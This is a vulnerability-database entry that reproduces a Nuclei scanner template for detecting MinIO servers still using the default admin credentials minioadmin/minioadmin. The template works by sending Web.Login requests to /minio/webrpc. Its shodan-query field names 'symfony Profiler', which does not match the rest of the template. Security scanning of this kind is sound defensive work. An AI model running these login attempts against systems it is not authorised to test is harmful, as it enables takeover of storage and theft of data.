漏洞描述
Minio default admin credentials were discovered.
minio-default-login: Minio Default Login
PoC代码[已公开]
id: minio-default-login
info:
name: Minio Default Login
author: pikpikcu
severity: high
description: Minio default admin credentials were discovered.
reference:
- https://docs.min.io/docs/minio-quickstart-guide.html#
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: http.html:"symfony Profiler"
product: minio
vendor: minio
tags: default-login,minio,vuln
http:
- raw:
- |
POST /minio/webrpc HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"id":1,"jsonrpc":"2.0","params":{"username":"{{username}}","password":"{{password}}"},"method":"Web.Login"}
- |
POST /minio/webrpc HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"id":1,"jsonrpc":"2.0","params":{"username":"{{username}}","password":"{{password}}"},"method":"web.Login"}
payloads:
username:
- minioadmin
password:
- minioadmin
attack: pitchfork
matchers-condition: and
matchers:
- type: word
words:
- "Content-Type: application/json"
part: header
- type: word
words:
- 'uiVersion'
- 'token'
part: body
condition: and
- type: status
status:
- 200
# digest: 490a0046304402201d7565d66c1faae0380b56ef5ec72f58fc51643879d584b85aca210b9541c85b02206bbc72d60c297b273592f8cd8a61106757c78c141521222046a14e2ef156a436:922c64590222798bb761d5b6d8e72950